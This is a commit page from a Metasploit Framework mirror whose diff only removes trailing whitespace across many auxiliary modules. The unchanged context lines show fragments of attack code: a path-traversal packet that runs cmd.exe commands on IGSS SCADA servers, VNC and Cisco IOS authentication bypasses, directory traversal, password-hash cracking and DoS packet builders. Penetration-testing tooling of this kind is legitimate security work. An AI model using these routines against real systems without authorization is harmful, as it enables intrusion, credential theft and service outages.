infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

msftidy on aux modules, see #5749

unstable
James Lee 2011-11-20 13:12:07 +11:00
parent f35b6c5269
commit 67120d4263
78 changed files with 249 additions and 249 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
View File

@ -56,13 +56,13 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.code == 500)
print_status("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
file = send_request_raw(
{
'method' => 'GET',
'uri' => '/' + tmpfile,
}, 25)
if (file and file.code == 200)
print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
elsif (file and file.code)

2
modules/auxiliary/admin/http/jboss_seam_exec.rb
View File

@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Exploited successfully")
else
print_status("Exploit failed.")
end
end
else
print_error("Target appears not vulnerable!")
end

2
modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
View File

@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
@files_found << files
@files_found << files
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")

2
modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if (res and res.code == 200)
print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
@files_found << files
@files_found << files
elsif (res and res.code)
print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
end

2
modules/auxiliary/admin/mssql/mssql_enum.rb
View File

@ -710,7 +710,7 @@ class Metasploit3 < Msf::Auxiliary
'xp_IsNTAdmin',
'xp_mapdown_bitmap'
]
query = <<-EOS
SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P')
AND SYSOBJECTS.ID = SYSPROTECTS.ID

2
modules/auxiliary/admin/scada/igss_exec_17.rb
View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{exec}"
packet << "\x00" * (143 + exec.length)
print_status("Sending command: #{exec}")
sock.put(packet)
sock.get_once(-1,0.5)

6
modules/auxiliary/admin/smb/check_dir_file.rb
View File

@ -56,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
if (datastore['VERBOSE'])
print_status("Connecting to the server...")
end
begin
connect()
smb_login()
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
if (datastore['VERBOSE'])
print_status("Checking for file/folder #{datastore['RPATH']}...")
end
if (fd = simple.open("\\#{datastore['RPATH']}", 'o')) # mode is open only - do not create/append/write etc
print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']}")
fd.close

14
modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
View File

@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'RealVNC NULL Authentication Mode Bypass',
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("The vncviewer does not appear to be installed, exiting...")
return nil
end
print_status("Spawning viewer thread...")
print_status("Spawning viewer thread...")
view = framework.threads.spawn("VncViewerWrapper", false) {
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
}
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
# Establishes the connection between the viewier and the remote server
client = listener.accept
add_socket(client)
# Closes the listener socket as it is no longer needed
listener.close
@ -91,9 +91,9 @@ class Metasploit3 < Msf::Auxiliary
client.puts(serverhello)
clienthello = client.get_once
s.puts(clienthello)
authmethods = s.read(2)
print_status("Auth methods received. Sending null authentication option to client")
client.write("\x01\x01")
client.read(1)
@ -121,11 +121,11 @@ class Metasploit3 < Msf::Auxiliary
s.put(data)
end
rescue
print_error("Client closed connection")
print_error("Client closed connection")
closed = true
end
end
if selected[0].include?(s)
begin
data = s.get_once

2
modules/auxiliary/admin/zend/java_bridge.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(runtime)
res = sock.get_once()
methodid = res[5,4]
exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')
exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd

48
modules/auxiliary/analyze/jtr_crack_fast.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
def run
wordlist = Rex::Quickfile.new("jtrtmp")
hashlist = Rex::Quickfile.new("jtrtmp")
begin
# Seed the wordlist with usernames, passwords, and hostnames
seed = []
@ -47,42 +47,42 @@ class Metasploit3 < Msf::Auxiliary
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
# Grab any known passwords out of the john.pot file
john_cracked_passwords.values {|v| seed << v }
# Write the seed file
wordlist.write( seed.flatten.uniq.join("\n") + "\n" )
print_status("Seeded the password database with #{seed.length} words...")
# Append the standard JtR wordlist as well
::File.open(john_wordlist_path, "rb") do |fd|
wordlist.write fd.read(fd.stat.size)
end
# Close the wordlist to prevent sharing violations (windows)
# Close the wordlist to prevent sharing violations (windows)
wordlist.close
# Create a PWDUMP style input file for SMB Hashes
smb_hashes = myworkspace.creds.select{|x| x.ptype == "smb_hash" }
smb_hashes.each do |cred|
hashlist.write( "cred_#{cred[:id]}:#{cred[:id]}:#{cred[:pass]}:::\n" )
end
hashlist.close
if smb_hashes.length > 0
cracked_ntlm = {}
cracked_lm = {}
added = []
# Crack this in LANMAN format using wordlist mode with tweaked rules
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
# Crack this in LANMAN format using various incremntal modes
john_crack(hashlist.path, :incremental => "All4", :format => 'lm')
john_crack(hashlist.path, :incremental => "Digits5", :format => 'lm')
# Parse cracked passwords and permute LANMAN->NTLM as needed
cracked = john_show_passwords(hashlist.path, 'lm')
cracked[:users].each_pair do |k,v|
@ -90,52 +90,52 @@ class Metasploit3 < Msf::Auxiliary
next if (v[0,7] == "???????" or v[7,7] == "???????")
next if not k =~ /^cred_(\d+)/m
cid = $1.to_i
cracked_lm[k] = v
cred_find = smb_hashes.select{|x| x[:id] == cid}
next if cred_find.length == 0
cred = cred_find.first
ntlm = cred.pass.split(":", 2).last
done = john_lm_upper_to_ntlm(v, ntlm)
cracked_ntlm[k] = done if done
end
# Append any cracked values to the wordlist
tfd = ::File.open(wordlist.path, "ab")
cracked_lm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
tfd.close
# Crack this in NTLM format
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'nt')
# Crack this in NTLM format using various incremntal modes
john_crack(hashlist.path, :incremental => "All4", :format => 'nt')
john_crack(hashlist.path, :incremental => "Digits5", :format => 'nt')
# Parse cracked passwords
cracked = john_show_passwords(hashlist.path, 'nt')
cracked[:users].each_pair do |k,v|
next if cracked_ntlm[k]
cracked_ntlm[k] = v
cracked_ntlm[k] = v
end
# Append any cracked values to the wordlist
tfd = ::File.open(wordlist.path, "ab")
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
tfd.close
# Store the cracked results based on user_id => cred.id
cracked_ntlm.each_pair do |k,v|
next if not k =~ /^cred_(\d+)/m
cid = $1.to_i
cred_find = smb_hashes.select{|x| x[:id] == cid}
next if cred_find.length == 0
cred = cred_find.first
print_good("Cracked: #{cred.user}:#{v} (#{cred.service.host.address}:#{cred.service.port})")
report_auth_info(
:host => cred.service.host,
@ -148,9 +148,9 @@ class Metasploit3 < Msf::Auxiliary
)
end
end
# XXX: Enter other hash types here (shadow, etc)
rescue ::Timeout::Error
ensure
wordlist.close rescue nil

4
modules/auxiliary/analyze/jtr_linux.rb
View File

@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
] ,
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
)
register_options(
[
OptBool.new('Crypt',[false, 'Try crypt() format hashes(Very Slow)', false])
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end

10
modules/auxiliary/analyze/jtr_mssql_fast.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@wordlist = Rex::Quickfile.new("jtrtmp")
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.close
print_status("Cracking MSSQL Hashes")
crack("mssql")
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
def crack(format)
hashlist = Rex::Quickfile.new("jtrtmp")
ltype= "#{format}.hashes"
myloots = myworkspace.loots.find(:all, :conditions => ['ltype=?', ltype])
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
cracked = john_show_passwords(hashlist.path, format)
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
report_auth_info(
:host => v[1],

12
modules/auxiliary/analyze/jtr_mysql_fast.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def run
wordlist = Rex::Quickfile.new("jtrtmp")
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
wordlist.close
hashlist = Rex::Quickfile.new("jtrtmp")
@ -69,11 +69,11 @@ class Metasploit3 < Msf::Auxiliary
cracked = john_show_passwords(hashlist.path, 'mysql-fast')
print_status("#{cracked[:cracked]} hashes were cracked!")
print_status("#{cracked[:cracked]} hashes were cracked!")
#Save cracked creds and add the passwords back to the wordlist for the next round
tfd = ::File.open(wordlist.path, "ab")
cracked[:users].each_pair do |k,v|
cracked[:users].each_pair do |k,v|
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
tfd.write( v[0] + "\n" )
report_auth_info(
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
:sname => 'mssql',
:user => k,
:pass => v[0]
)
)
end
print_status("Trying 'mysql-sha1' Wordlist: #{wordlist.path}")
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
john.each_line{|line| seed << line.chomp}
return seed
end
# huh?

12
modules/auxiliary/analyze/jtr_oracle_fast.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@wordlist = Rex::Quickfile.new("jtrtmp")
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.close
crack("oracle")
crack("oracle11g")
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -84,8 +84,8 @@ class Metasploit3 < Msf::Auxiliary
return seed
end
def crack(format)
hashlist = Rex::Quickfile.new("jtrtmp")
@ -116,8 +116,8 @@ class Metasploit3 < Msf::Auxiliary
cracked = john_show_passwords(hashlist.path, format)
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
report_auth_info(
:host => v[1],

4
modules/auxiliary/analyze/jtr_unshadow.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('passwd', [true, 'The path to the passwd file']),
@ -48,4 +48,4 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
end

12
modules/auxiliary/analyze/postgres_md5_crack.rb
View File

@ -25,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %Q{
This module attempts to crack Postgres SQL md5 password hashes.
It creates hashes based on information saved in the MSF Database
It creates hashes based on information saved in the MSF Database
such as hostnames, usernames, passwords, and database schema information.
The user can also supply an additional external wordlist if they wish.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('Wordlist', [false, 'The path to an optional Wordlist']),
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
myloots.each do |myloot|
begin
postgres_array = CSV.read(myloot.path).drop(1)
rescue
rescue
print_error("Unable to process #{myloot.path}")
end
postgres_array.each do |row|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
:user => row[0],
:pass => password
)
end
end
end
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
if datastore['Munge']
mungedseed=[]
seed.each do |word|
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
mungedseed << munged
munged.gsub!(/[eE]/, "3")
munged.gsub!(/[tT]/, "7")

2
modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(sploit + "\r\n\r\n")
disconnect
print_status("DoS packet unsuccessful.")
rescue ::Rex::ConnectionRefused
print_status("Unable to connect to #{rhost}:#{rport}.")

4
modules/auxiliary/dos/http/sonicwall_ssl_format.rb
View File

@ -51,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary
print_error("FORMAT string length cannot exceed 125 bytes.")
return
end
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
begin
res = send_request_raw({
'uri' => datastore['URI'] + fmt,
})
if res.code == 200
res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
print_status("Information leaked: #{$1}")

2
modules/auxiliary/dos/tcp/junos_tcp_opt.rb
View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def run
open_pcap
p = PacketFu::TCPPacket.new
p.ip_daddr = rhost
p.ip_saddr = shost

2
modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb
View File

@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
# counts
pkt << [1,0,0,0].pack('n*')
if str[0,1] == "."
pkt << [str.length].pack('C')
end

8
modules/auxiliary/fuzzers/http/http_form_field.rb
View File

@ -68,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
if datastore['SSL']
proto = "https://"
end
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
if datastore['UserAgent'] != nil
if datastore['UserAgent'].length > 0
useragent = datastore['UserAgent']
end
end
host = datastore['RHOST']
if datastore['VHOST']
if datastore['VHOST'].length > 0
host = datastore['VHOST']
end
end
@send_data = {
:uri => '',
:version => '1.1',
@ -515,7 +515,7 @@ class Metasploit3 < Msf::Auxiliary
set_cookie(cookie)
print_status("Set cookie:#{cookie}")
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies")
response = send_request_raw(
{
'uri' => datastore['URL'],

2
modules/auxiliary/scanner/discovery/arp_sweep.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
shost = datastore['SHOST']
shost ||= get_ipv4_addr(@interface) if @netifaces
raise RuntimeError ,'SHOST should be defined' unless shost
smac = datastore['SMAC']
smac ||= get_mac(@interface) if @netifaces
raise RuntimeError ,'SMAC should be defined' unless smac

4
modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
View File

@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary
# Send ping
print_status("Sending multicast pings...")
dmac = "33:33:00:00:00:01"
# Figure out our source address by the link-local interface
shost = ipv6_link_address
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})

2
modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
View File

@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
def neighbor_discovery(neighs)
print_status("Discovering IPv6 addresses for IPv4 nodes...")
print_status("")
smac = datastore['SMAC']
open_pcap({'SNAPLEN' => 68, 'FILTER' => "icmp6"})

2
modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
View File

@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
p.ipv6_next = 0x3a
p.ipv6_saddr = shost
p.ipv6_daddr = dhost
payload = router_advertisement_payload
payload << opt60_payload(lifetime, prefix)
payload << slla_payload(smac)

10
modules/auxiliary/scanner/discovery/udp_probe.rb
View File

@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary
hname = nil
case pkt[2]
when 53
app = 'DNS'
ver = nil
@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
when 137
app = 'NetBIOS'
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Auxiliary
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
when 1434
app = 'MSSQL'
mssql_ping_parse(pkt[0]).each_pair { |k,v|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
return if not asn
snmp_error = asn.value[0].value rescue nil
snmp_comm = asn.value[1].value rescue nil
snmp_data = asn.value[2].value[3].value[0] rescue nil
@ -242,7 +242,7 @@ class Metasploit3 < Msf::Auxiliary
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
inf = snmp_info
com = snmp_comm
com = snmp_comm
when 5093
app = 'Sentinel'

14
modules/auxiliary/scanner/discovery/udp_sweep.rb
View File

@ -160,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
hname = nil
case pkt[2]
when 53
app = 'DNS'
ver = nil
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
when 137
app = 'NetBIOS'
@ -248,7 +248,7 @@ class Metasploit3 < Msf::Auxiliary
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
when 1434
app = 'MSSQL'
mssql_ping_parse(pkt[0]).each_pair { |k,v|
@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
app = 'SNMP'
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
return if not asn
snmp_error = asn.value[0].value rescue nil
snmp_comm = asn.value[1].value rescue nil
snmp_data = asn.value[2].value[3].value[0] rescue nil
@ -270,13 +270,13 @@ class Metasploit3 < Msf::Auxiliary
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
inf = snmp_info
com = snmp_comm
com = snmp_comm
when 5093
app = 'Sentinel'
when 523
app = 'ibm-db2'
inf = db2disco_parse(pkt[0])

4
modules/auxiliary/scanner/http/adobe_xml_inject.rb
View File

@ -83,13 +83,13 @@ class Metasploit3 < Msf::Auxiliary
'Content-Type' => 'application/x-amf',
'data' => postrequest
}, 25)
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body =~ /\<\?xml version\="1.0" encoding="utf-8"\?\>/)
print_status("#{rhost}:#{rport} #{check} #{res.code}\n #{res.body}")
elsif (res and res.code == 302 or res.code == 301)
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
else
print_error("#{res.code} for #{check}")
#''

22
modules/auxiliary/scanner/http/cisco_device_manager.rb
View File

@ -15,13 +15,13 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Include Cisco utility methods
include Msf::Auxiliary::Cisco
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
authentication.
authentication.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
res = send_request_cgi({
'uri' => "/exec/show/version/CR",
'method' => 'GET'
@ -61,11 +61,11 @@ class Metasploit3 < Msf::Auxiliary
print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")
return
end
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
# Report a vulnerability only if no password was specified
# Report a vulnerability only if no password was specified
if datastore['BasicAuthPass'].to_s.length == 0
report_vuln(
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
)
end
res = send_request_cgi({
'uri' => "/exec/show/config/CR",
'method' => 'GET'
@ -94,9 +94,9 @@ class Metasploit3 < Msf::Auxiliary
else
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
end
end
end
end

14
modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
View File

@ -15,13 +15,13 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Include Cisco utility methods
include Msf::Auxiliary::Cisco
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
16.upto(99) do |level|
res = send_request_cgi({
'uri' => "/level/#{level}/exec/show/version/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "/level/#{level}/exec/show/config/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
config = $2.strip
print_good("#{rhost}:#{rport} Processing the configuration file...")
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
else
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
end
break
end
end

2
modules/auxiliary/scanner/http/cold_fusion_version.rb
View File

@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
out = "Adobe ColdFusion 8"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
out = "Adobe ColdFusion 9"
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)

6
modules/auxiliary/scanner/http/files_dir.rb
View File

@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
'~',
''
]
conn = false
tpath = datastore['PATH']
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
dm = datastore['NoDetailMessages']
extensions << datastore['EXT']
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
queue << testf.strip
end
#
# Detect error code
#

4
modules/auxiliary/scanner/http/glassfish_login.rb
View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
], self.class)
end
#
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
# banner (ex: Sun Java System Application Server 9.x)
@ -224,7 +224,7 @@ class Metasploit3 < Msf::Auxiliary
edition, version, banner = get_version(res)
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
print_status("#{target_url} - GlassFish - Attempting authentication")
if (version == '2.x' or version == '9.x' or version == '3.0')
try_glassfish_auth_bypass(version)
end

14
modules/auxiliary/scanner/http/http_login.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
end
def find_auth_uri_and_scheme
path_and_scheme = []
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
paths = [datastore['AUTH_URI']]
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
/Management.asp
}
end
paths.each do |path|
res = send_request_cgi({
'uri' => path,
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
print_error("You need need to set AUTH_URI when using PUT Method !")
return
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
success = false
proof = ""
ret = do_http_login(user,pass,@scheme)
return :abort if ret == :abort
if ret == :success
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Auxiliary
return :fail
end
def do_http_auth_digest(user,pass,requesttype)
path = datastore['AUTH_URI'] || "/"
begin
@ -284,14 +284,14 @@ class Metasploit3 < Msf::Auxiliary
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
}, 25)
end
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
return :abort
end
return :abort if (res.code == 404)
if (res.code == 200) or (res.code == 201)

2
modules/auxiliary/scanner/http/http_put.rb
View File

@ -135,7 +135,7 @@ class Metasploit4 < Msf::Auxiliary
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
vprint_status("No filename specified. Using: #{path}")
end
#Upload file
res = do_put(path, data)
vprint_status("Reply: #{res.code.to_s}")

8
modules/auxiliary/scanner/http/httpbl_lookup.rb
View File

@ -55,11 +55,11 @@ class Metasploit3 < Msf::Auxiliary
end
return results
end
def translate(ip)
ip.split('.')
end
def run_host(ip)
result = resolve(ip)
if result != 0
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
elsif threatnum > 75 then
threat = "over 1 million"
end
typenum = breakup[3]
typestring = case typenum
when '0' then 'Search Engine'
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
else
"Unknown"
end
print_status ""
print_status "#{ip} resloves to #{result} which means: #{typestring}"
print_status "=> it was last seen #{lastseen} day ago and has a threat score of #{threatnum} or \'#{threat} spam messages\'"

8
modules/auxiliary/scanner/http/jboss_vulnscan.rb
View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain',
}, 20)
if res
info = http_fingerprint({ :response => res })
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
if(res.body and />(JBoss[^<]+)/.match(res.body) )
